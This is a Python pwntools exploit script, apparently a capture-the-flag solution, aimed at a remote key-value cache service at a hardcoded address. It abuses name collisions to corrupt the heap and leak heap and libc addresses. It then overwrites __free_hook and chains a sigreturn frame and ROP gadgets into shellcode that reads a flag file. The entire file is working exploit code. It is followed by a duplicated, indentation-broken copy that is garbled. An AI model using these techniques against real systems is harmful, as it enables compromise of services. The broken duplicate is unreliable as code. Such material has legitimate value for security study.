kungfulon/ex.py

## ex.py
#!/usr/bin/env python3

from pwn import *

context.os = 'linux'
context.arch = 'amd64'
context.terminal = ['tmux', 'new-window']

l = ELF('./libc-2.31.so')

r = remote('3.139.106.4', 27015)

def create(name, size):
    r.sendlineafter('> ', '1')
    r.sendlineafter('Name: ', name)
    r.sendlineafter('Size: ', str(size))

def read(name, offset, n):
    r.sendlineafter('> ', '2')
    r.sendlineafter('Name: ', name)
    r.sendlineafter('Offset: ', str(offset))
    r.sendlineafter('Count: ', str(n))

def write(name, offset, dat):
    r.sendlineafter('> ', '3')
    r.sendlineafter('Name: ', name)
    r.sendlineafter('Offset: ', str(offset))
    r.sendlineafter('Count: ', str(len(dat)))
    r.sendafter('Data: ', dat)

def erase(name):
    r.sendlineafter('> ', '4')
    r.sendlineafter('Name: ', name)

name1 = b'\x6b\x29\x30\x1a\x60\x1d\xb9\xae\xf6\x70\xca\x61\xa1\x2c\x9e\x2f'
name2 = b'\x6b\x29\x73\x00\xc5\x37\x11\x20\xf6\x70\x0d\x48\x06\x47\xf6\xa0'

create(name1, 8)
write(name1, 0, b'AAAAAAAA')
create('A', 0x1000)
write('A', 0, 'A')
create('B', 8)
erase('A')
create(name2, 0x1000000)
read(name1, 0x20, 0x8)
heap = u64(r.recvn(8)) - 0x11ee0
log.info('heap = 0x{:x}'.format(heap))
read(name1, 0x80, 0x8)
l.address = u64(r.recvn(8)) - 0x1ebbe0
log.info('libc = 0x{:x}'.format(l.address))

srop = SigreturnFrame()
srop['uc_stack.ss_size'] = l.symbols['setcontext'] + 0x3d
srop.rdi = 0x414141410000
srop.rsi = 0x1000
srop.rdx = 0x7
srop.rcx = 0x22
srop.rsp = heap + 0x14050 + len(bytes(srop))
srop.rip = l.symbols['mmap']

rop  = bytes(srop)
rop += p64(l.symbols['gets'])
rop += p64(l.address + 0x26e91) # jmp rax

write(name1, 0x2000, rop)
write(name1, 0x10c8, p64(l.symbols['__free_hook']))
write('B', 0, p64(l.address + 0x154930)) # mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
erase(b'A' * 8 + p64(heap + 0x14050))
r.sendline(asm(shellcraft.open('/home/cache/flag') + shellcraft.read('rax', heap, 0x1000) + shellcraft.write(1, heap, 'rax')))

r.interactive()
	#!/usr/bin/env python3

	from pwn import *

	context.os = 'linux'
	context.arch = 'amd64'
	context.terminal = ['tmux', 'new-window']

	l = ELF('./libc-2.31.so')

	r = remote('3.139.106.4', 27015)

	def create(name, size):
	r.sendlineafter('> ', '1')
	r.sendlineafter('Name: ', name)
	r.sendlineafter('Size: ', str(size))

	def read(name, offset, n):
	r.sendlineafter('> ', '2')
	r.sendlineafter('Name: ', name)
	r.sendlineafter('Offset: ', str(offset))
	r.sendlineafter('Count: ', str(n))

	def write(name, offset, dat):
	r.sendlineafter('> ', '3')
	r.sendlineafter('Name: ', name)
	r.sendlineafter('Offset: ', str(offset))
	r.sendlineafter('Count: ', str(len(dat)))
	r.sendafter('Data: ', dat)

	def erase(name):
	r.sendlineafter('> ', '4')
	r.sendlineafter('Name: ', name)

	name1 = b'\x6b\x29\x30\x1a\x60\x1d\xb9\xae\xf6\x70\xca\x61\xa1\x2c\x9e\x2f'
	name2 = b'\x6b\x29\x73\x00\xc5\x37\x11\x20\xf6\x70\x0d\x48\x06\x47\xf6\xa0'

	create(name1, 8)
	write(name1, 0, b'AAAAAAAA')
	create('A', 0x1000)
	write('A', 0, 'A')
	create('B', 8)
	erase('A')
	create(name2, 0x1000000)
	read(name1, 0x20, 0x8)
	heap = u64(r.recvn(8)) - 0x11ee0
	log.info('heap = 0x{:x}'.format(heap))
	read(name1, 0x80, 0x8)
	l.address = u64(r.recvn(8)) - 0x1ebbe0
	log.info('libc = 0x{:x}'.format(l.address))

	srop = SigreturnFrame()
	srop['uc_stack.ss_size'] = l.symbols['setcontext'] + 0x3d
	srop.rdi = 0x414141410000
	srop.rsi = 0x1000
	srop.rdx = 0x7
	srop.rcx = 0x22
	srop.rsp = heap + 0x14050 + len(bytes(srop))
	srop.rip = l.symbols['mmap']

	rop = bytes(srop)
	rop += p64(l.symbols['gets'])
	rop += p64(l.address + 0x26e91) # jmp rax

	write(name1, 0x2000, rop)
	write(name1, 0x10c8, p64(l.symbols['__free_hook']))
	write('B', 0, p64(l.address + 0x154930)) # mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
	erase(b'A' * 8 + p64(heap + 0x14050))
	r.sendline(asm(shellcraft.open('/home/cache/flag') + shellcraft.read('rax', heap, 0x1000) + shellcraft.write(1, heap, 'rax')))

	r.interactive()